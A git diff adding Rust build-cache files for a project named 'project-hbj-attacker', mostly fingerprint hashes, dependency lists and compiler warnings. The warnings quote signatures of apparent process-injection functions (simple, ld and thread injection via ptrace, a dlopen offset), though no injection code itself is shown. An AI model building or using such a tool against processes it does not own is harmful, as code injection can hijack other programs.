\u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m57\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let mut dlopen_offset: u64 = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: maybe it is overwritten before being read?\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_assignments)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `seg_rw`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":4330,"byte_end":4336,"line_start":112,"line_end":112,"column_start":22,"column_end":28,"is_primary":true,"text":[{"text":"fn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject","highlight_start":22,"highlight_end":28}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":4330,"byte_end":4336,"line_start":112,"line_end":112,"column_start":22,"column_end":28,"is_primary":true,"text":[{"text":"fn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject","highlight_start":22,"highlight_end":28}],"label":null,"suggested_replacement":"_seg_rw","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `seg_rw`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:112:22\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m112\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_seg_rw`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `inject1` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":434,"byte_end":441,"line_start":23,"line_end":23,"column_start":4,"column_end":11,"is_primary":true,"text":[{"text":"fn inject1(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // Simple injection","highlight_start":4,"highlight_end":11}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `inject1` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:23:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m23\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject1(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // Simple injection\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `inject2` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":1333,"byte_end":1340,"line_start":48,"line_end":48,"column_start":4,"column_end":11,"is_primary":true,"text":[{"text":"fn inject2(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // ld injection","highlight_start":4,"highlight_end":11}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `inject2` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:48:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m48\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject2(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // ld injection\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `module_base_address` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/map.rs","byte_start":1290,"byte_end":1309,"line_start":49,"line_end":49,"column_start":8,"column_end":27,"is_primary":true,"text":[{"text":"pub fn module_base_address(range_strings: &Vec<&str>, module_name: &str) -> Option {","highlight_start":8,"highlight_end":27}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `module_base_address` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/map.rs:49:8\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m49\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub fn module_base_address(range_strings: &Vec<&str>, module_name: &str) -> Option {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"5 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 5 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..f4863bb
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/test-bin-project-hbj-attacker
@@ -0,0 +1 @@
+6337d08d2d48ea7d
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..ea8382f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[7883780462905440460,"libloading",false,15801149763391923402],[11499138078358568213,"libc",false,1099485397091021021],[14034831750265444586,"ctor",false,15755893537085299923],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/dep-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/dep-lib-project_hbj_attacker
new file mode 100644
index 0000000..024be49
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/dep-lib-project_hbj_attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/lib-project_hbj_attacker
new file mode 100644
index 0000000..9dd086f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/lib-project_hbj_attacker
@@ -0,0 +1 @@
+53d1bf36929e4b9d
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/lib-project_hbj_attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/lib-project_hbj_attacker.json
new file mode 100644
index 0000000..5af7185
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/lib-project_hbj_attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":1436332732506357817,"profile":17672942494452627365,"path":10763286916239946207,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[7883780462905440460,"libloading",false,15801149763391923402],[11499138078358568213,"libc",false,1099485397091021021],[14034831750265444586,"ctor",false,15755893537085299923],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-bc7bc8543b7ae63f/dep-lib-project_hbj_attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/bin-project-hbj-attacker
new file mode 100644
index 0000000..215774b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/bin-project-hbj-attacker
@@ -0,0 +1 @@
+0aae86aa6330d4a3
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..baa92ff
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":8731458305071235362,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,1524876878938899937]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..a86a10a
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..b9e6884
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-c958ff1e796a1688/output-bin-project-hbj-attacker
@@ -0,0 +1,3 @@
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1200,"byte_end":1201,"line_start":42,"line_end":42,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1200,"byte_end":1201,"line_start":42,"line_end":42,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:42:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m42\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `sys_write_test` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":203,"byte_end":217,"line_start":14,"line_end":14,"column_start":4,"column_end":18,"is_primary":true,"text":[{"text":"fn sys_write_test()","highlight_start":4,"highlight_end":18}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `sys_write_test` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:14:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m14\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn sys_write_test()\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"2 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 2 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/bin-project-hbj-attacker
new file mode 100644
index 0000000..adfbdc1
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/bin-project-hbj-attacker
@@ -0,0 +1 @@
+f261f8000ddf6b42
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..6b85a60
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..d2376bb
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..457216e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-d211ab56812d141c/output-bin-project-hbj-attacker
@@ -0,0 +1,5 @@
+{"$message_type":"diagnostic","message":"unused import: `processes::write_memory_vm`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/helper.rs","byte_start":138,"byte_end":164,"line_start":7,"line_end":7,"column_start":9,"column_end":35,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":9,"highlight_end":35}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_imports)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"remove the whole `use` item","code":null,"level":"help","spans":[{"file_name":"src/helper.rs","byte_start":130,"byte_end":166,"line_start":7,"line_end":8,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":1,"highlight_end":36},{"text":"pub use processes::write_memory_ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `processes::write_memory_vm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper.rs:7:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m7\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub use processes::write_memory_vm;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_imports)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `sys_write_test` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":203,"byte_end":217,"line_start":14,"line_end":14,"column_start":4,"column_end":18,"is_primary":true,"text":[{"text":"fn sys_write_test()","highlight_start":4,"highlight_end":18}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `sys_write_test` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:14:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m14\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn sys_write_test()\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `write_memory_vm` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1757,"byte_end":1772,"line_start":68,"line_end":68,"column_start":8,"column_end":23,"is_primary":true,"text":[{"text":"pub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {","highlight_start":8,"highlight_end":23}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `write_memory_vm` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:68:8\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m68\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^\u001b[0m\n\n"}
